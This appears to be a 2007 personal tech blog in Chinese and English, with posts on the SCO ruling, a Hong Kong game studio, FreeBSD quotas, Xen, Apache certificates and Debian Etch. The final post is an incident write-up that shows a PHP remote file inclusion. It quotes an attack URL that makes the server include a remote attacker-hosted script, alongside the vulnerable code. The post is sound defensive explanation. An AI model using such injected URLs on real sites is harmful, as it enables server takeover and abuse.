まだ逆境か？夢をあきらめないで

這個是舊聞, 本人是在8月11日lwn上得知這個消息, 現在筆錄一下.

SCO和IBM 為了unix 版權問題的官司,

法官最後得出結論是, novell 沒有轉移任何unix及unixware 的版權給SCO,

因此判SCO敗訴.

詳細新聞: http://lwn.net/Articles/245202/

http://firedog.hk/blog/2007/08/08/end-of-firedog/

火狗工房, 一間香港原創遊戲開發公司, 在他的的開發blog中,

宣佈若沒有資金的話, 將會結業.

愛神餐館, 一隻能成功打入日本市場的遊戲,

火狗的成功, 雖然蝕足八年,

但正如他們的blog所說

“能夠創作原創的動畫、漫畫和遊戲，就是我的夢想，就是火狗全體成員的夢想”,

這不只是火狗全體成員的夢想,

亦是我們軟體開發員的夢想,

亦證明香港是有能力開發出好的遊戲.

在此只能衷心希望火狗能支持下去,

繼續出好game.

就算不能支持下去, 亦希望其最後作品是一個成功的作品.

若真的結業，

真香港的損失, 香港又失去一間能開發出高質素遊戲的公司.

唉, 在ｃｏｍｉｃ　ｗｏｒｌｄ排隊去買火狗週邊產品及遊戲的情景可能不復存在……可惜可惜.

Need to recompile kernel.

cd /usr/src/sys/i386/conf

cp GENERIC MYKERNEL

Edit the file MYKERNEL and add the line

options QUOTA

Then run the following commands:

/usr/sbin/config MYKERNEL

cd ../compile/MYKERNEL

make depend

make

make install

——

To Enable Quota

Edit the file /etc/fstab and look for the entry, in which the directory /home is mentioned, e.g.

/dev/ad0s1d /home ufs rw 2 2

Add the words userquota and groupquota as follows:

/dev/ad0s1d /home ufs rw,userquota,groupquota 2 2

To enable quota at boot time you have to add the following lines to /etc/rc.conf:

quota_enable=”YES”

check_quotas=”YES”

Reboot the system:

shutdown -r now

After the reboot run the following commands:

quotacheck -a

quotaon -a

Install the setquota-Tool at last:

pkg_add -r setquota

Here is the instruction for running XEN on Debian Etch on Core2Duo 6300 with 2GB Ram.

First, install all the packages that related to XEN.

apt-get install  libc6-xen linux-headers-2.6-xen-686
linux-headers-2.6-xen-vserver-686 linux-headers-2.6.18-4-xen
linux-headers-2.6.18-4-xen-686 linux-headers-2.6.18-4-xen-vserver
linux-headers-2.6.18-4-xen-vserver-686 linux-image-2.6-xen-686
linux-image-2.6-xen-vserver-686 linux-image-2.6.18-4-xen-686
linux-image-2.6.18-4-xen-vserver-686 linux-image-xen-686
linux-image-xen-vserver-686 linux-modules-2.6.18-4-xen-686
linux-modules-2.6.18-4-xen-vserver-686 xen-hypervisor-3.0.3-1-i386
xen-hypervisor-3.0.3-1-i386-pae xen-ioemu-3.0.3-1 xen-tools
xen-utils-3.0.3-1 xen-utils-common bridge-utils iproute sysfsutils

Then, boot reboot the machine and choose the pae kernel to boot.

Next, add the following into /etc/network/interface for the Xen Bridge neteork.

auto xenbr0
iface xenbr0 inet dhcp
bridge_ports eth0
# optional
bridge_maxwait 0

To build a new debian domain:

Configurature /etc/xen-tools/xen-tools.conf collectly such as kernel version and initrd.

Then, run

xen-create-image --hostname=<name_of_DomU> --dir /home/xen/images/debian

Next, configurature

/etc/xen/<name_of_DomU>.cfg

to make sure all the Tag are correct.

Finally, run

xm create test.cfg -c

to run the VM.

As Core2Duo 6300 support VT, we could run Windows under Xen.

To run Windows in Xen,

first, build an image file for windows.

dd if=/dev/zero of=/home/xen/images/WinXP.img bs=1M count=4096

Next, copy the Windows XP install CD in to an iso format

dd if=/dev/cdrom of=/home/xen/cds/winxp.iso

Then, build a winxp config file in /etc/xen as the following. eg:

vi /etc/xen/winxp

kernel = "hvmloader"
builder='hvm'
memory = 512
name = "winxp"
vif = [ 'type=ioemu, bridge=xenbr0' ]
disk = [ 'file:/home/xen/images/WinXP.img,ioemu:hda,w',
'file:/home/xen/cds/winxp.iso,hdc:cdrom,r' ]
#cdrom = '/dev/hda'
device_model = 'qemu-dm'
boot="dc"
sdl=1
vnc=0
nographic=0
localtime=1

Run

xm create winxp -c

to boot up the VM and install XP.

After finished installing the XP, turn off the VM and

change the

boot="dc"

to

boot="c"

in

/etc/xen/winxp

While the Debian apache2 package was in Apache version 2.0, there was a tool called “apache2-ssl-certificate” for the users to use that script to gererate their own self-signed cert themselves. However, the script was removed since the apache2 package had been upgraded to Apache v2.2.

I had modified the old script so that it can generate a suitable self-signed cert for the new apache2(Apache v2.2) in Debain.

Here is the code:

#!/bin/sh -e

DAYS="365"
CERTPATH="/etc/apache2/ssl"
CERTNAME="apache"
KEYBIT="1024"
FORCE="0";

usage(){
    echo "This is a program for the users to gernate their own self-signed certificate."
    echo
    echo "Usage:  $0 [[OPTION] [VALUE]]..."
    echo
    echo "OPTIONS:"
    echo "  -h | -help | --help -- To Show This Help"
    echo "  -f | --force        -- Force to generate the cert"
    echo "  -d | -days | --days -- cert to expire after x days, default is 365"
    echo "  -p | -path | --path -- Path of the cert will be stored,"
    echo "                         default is /etc/apache/ssl"
    echo "  -n | -name | --name -- the name of the cert, default is apache"
    echo "  -b | -bit  | --bit  -- length of the key, default is 1024"
    echo
}

createcert() {
    if [ "$FORCE" != "1" -a -f $CERTPATH/$CERTNAME.pem ]; then
        echo "$CERTPATH/$CERTNAME.pem exists!  Use \"$0 --force.\""
        exit 0
    fi
    echo
    echo creating selfsigned certificate
    echo "replace it with one signed by a certification authority (CA)"
    echo
    echo enter your ServerName at the Common Name prompt
    echo
    echo If you want your certificate to expire after x days call this programm
    echo with "--days x"

    mkdir -p "$CERTPATH/"

    export RANDFILE=/dev/random
    openssl req $@ -new -x509 -days $DAYS -nodes
    -newkey rsa:$KEYBIT
    -out $CERTPATH/$CERTNAME.pem
    -keyout $CERTPATH/$CERTNAME.pem
    chmod 600 $CERTPATH/$CERTNAME.pem
}

case $1 in
    -h|help|--help)
        usage
        exit 0
    ;;
esac

until [ -z "$1" ]  # Until all parameters used up . . .
do
    case $1 in
        --force|-f|-force)
	    FORCE="1"
	    shift
        ;;
	--days|-d|-days)
	    DAYS=$2
	    shift
	    shift
	;;
	--path|-p|-path)
	    CERTPATH=$2
	    shift
	    shift
	;;
	--name|-n|-name)
	    CERTNAME=$2
	    shift
	    shift
	;;
	--bit|-n|-bit)
	    KEYBIT=$2
	    shift
	    shift
	;;
	*)
	    usage
	    exit 0
	;;
    esac
done
createcert

MD5SUM: 6fb69eb0d63a683e73461f4f682e13e5

為慶祝DEBIAN 4.0 released，Debian HK今日下午3時在又一城辦了一個聚會，

本人今日有幸能抽空出席。在聚會中，認識了不少LINUX的愛好者，

大家彼此交流了不少LINUX的經驗和知識， 是一個很好的聚會。

Debian Etch finally released on 8th April, 2007.
Here is the notice from debian-announce@lists.debian.org.

Debian GNU/Linux 4.0 released

The Debian Project is pleased to announce the official release of Debian
GNU/Linux version 4.0, codenamed "etch", after 21 months of constant
development.  Debian GNU/Linux is a free operating system which supports
a total of eleven processor architectures and includes the KDE, GNOME
and Xfce desktop environments.  It also features cryptographic software
and compatibility with the FHS v2.3 and software developed for version
3.1 of the LSB.

Using a now fully integrated installation process, Debian GNU/Linux 4.0
comes with out-of-the-box support for encrypted partitions.  This
release introduces a newly developed graphical frontend to the
installation system supporting scripts using composed characters and
complex languages; the installation system for Debian GNU/Linux has now
been translated to 58 languages.

Also beginning with Debian GNU/Linux 4.0, the package management system
has been improved regarding security and efficiency.  Secure APT allows
the verification of the integrity of packages downloaded from a mirror.
Updated package indices won't be downloaded in their entirety, but
instead patched with smaller files containing only differences from
earlier versions.

Debian GNU/Linux runs on computers ranging from palmtops and handheld
systems to supercomputers, and on nearly everything in between.  A total
of eleven architectures are supported including:  Sun SPARC (sparc), HP
Alpha (alpha), Motorola/IBM PowerPC (powerpc), Intel IA-32 (i386) and
IA-64 (ia64), HP PA-RISC (hppa), MIPS (mips, mipsel), ARM (arm), IBM
S/390 (s390) and -- newly introduced with Debian GNU/Linux 4.0 -- AMD64
and Intel EM64T (amd64).

Debian GNU/Linux can be installed from various installation media such
as DVDs, CDs, USB sticks and floppies, or from the network.  GNOME is
the default desktop environment and is contained on the first CD.  The K
Desktop Environment (KDE) and the Xfce desktop can be installed through
two new alternative CD images.  Also newly available with Debian
GNU/Linux 4.0 are multi-arch CDs and DVDs supporting installation of
multiple architectures from a single disc.

Debian GNU/Linux can be downloaded right now via bittorent (the
recommended way), jigdo or HTTP;  see <http://www.debian.org/CD/> for
further information.  It will soon be available on DVD and CD-ROM from
numerous vendors <http://www.debian.org/CD/vendors/>, too.

This release includes a number of updated software packages, such as the
K Desktop Environment 3.5 (KDE), an updated version of the GNOME desktop
environment 2.14, the Xfce 4.4 desktop environment, the GNUstep desktop
5.2, X.Org 7.1, OpenOffice.org 2.0.4a, GIMP 2.2.13, Iceweasel (an
unbranded version of Mozilla Firefox 2.0.0.3), Icedove (an unbranded
version of Mozilla Thunderbird 1.5), Iceape (an unbranded version of
Mozilla Seamonkey 1.0.8), PostgreSQL 8.1.8, MySQL 5.0.32, GNU Compiler
Collection 4.1.1, Linux kernel version 2.6.18, Apache 2.2.3, Samba
3.0.24, Python 2.4.4 and 2.5, Perl 5.8.8, PHP 4.4.4 and 5.2.0, Asterisk
1.2.13, and more than 18,000 other ready to use software packages.

Upgrades to Debian GNU/Linux 4.0 from the previous release, Debian
GNU/Linux 3.1 codenamed "sarge", are automatically handled by the
aptitude package management tool for most configurations, and to a
certain degree also by the apt-get package management tool.  As always,
Debian GNU/Linux systems can be upgraded quite painlessly, in place,
without any forced downtime, but it is strongly recommended to read the
release notes for possible issues.  For detailed instructions about
installing and upgrading Debian GNU/Linux, please see the release notes
<http://www.debian.org/releases/etch/releasenotes>.  Please note that
the release notes will be further improved and translated to additional
languages in the coming weeks.

About Debian
------------

Debian GNU/Linux is a free operating system, developed by more than
a thousand volunteers from all over the world who collaborate via the
Internet.  Debian's dedication to Free Software, its non-profit nature,
and its open development model make it unique among GNU/Linux
distributions.

The Debian project's key strengths are its volunteer base, its dedication
to the Debian Social Contract, and its commitment to provide the best
operating system possible.  Debian 4.0 is another important step in that
direction.

Contact Information
-------------------

For further information, please visit the Debian web pages at
<http://www.debian.org/> or send mail to <press@debian.org>.

This instruction is for Gnome in Debian etch on kernel 2.6.18.

apt-get install bluetooth bluez-cups bluez-gnome bluez-hcxidump bluez-pcmcia-support bluez-utils libblurtooth2 obexfs obexftp obexpushd ussp-push

Send File to another device:

hcitool cc <address>

hcitool auth <address>

hcitool key <address>

obexftp -b <address> -p <file>

There is an interesting hack in an account of our client on our webhosting service. It is an online library system of our client which is written in PHP. One day, the system admin reported that the postfix died becaue of a lot of spam mails sending from the online library system. When I checked the log and saw the log like the following:

1171167204.920 534343 xxx.xx.xx.xxx TCP_MISS/200 63463 POST http://www.example.com/php/index.php?Name=http://www.geocities.com/meet_kunleb/Login/Meet_KunleB_Mail/Logon.do.txt?

When I go the the php file and know how the cracker crack the system. The problem is about php.

<?php
...
$pagename =$_GET['Name'];
…
?>
…
<?php include_once(”{$pagename}_main.inc”);?>
…


The problem is that the $pagename does not have any gruad to check the value that got by $_Get['name'].

The function of include_once is allow to include the source from outside, http://example.com/aaa.php

So, when cracker use a ‘http://example.org/aaa.txt?’ as name, and use the url, http://example.com/php/index.php?Name=http://example.org/aaa.txt? ,

The $pagename will become http://example.org/aaa.txt? and the indule_once function will execute as:


<?php include_once("http://example.org/aaa.txt?_main.inc");?>


That will executes the php script in http://example.org/aaa.txt and _main.inc will be an ARGV for that php script. This will be a security hole of the system.

So that for security, if it is necessary to use include_once, include function in dynamic,
it has to have a check to see it is from the place you want before.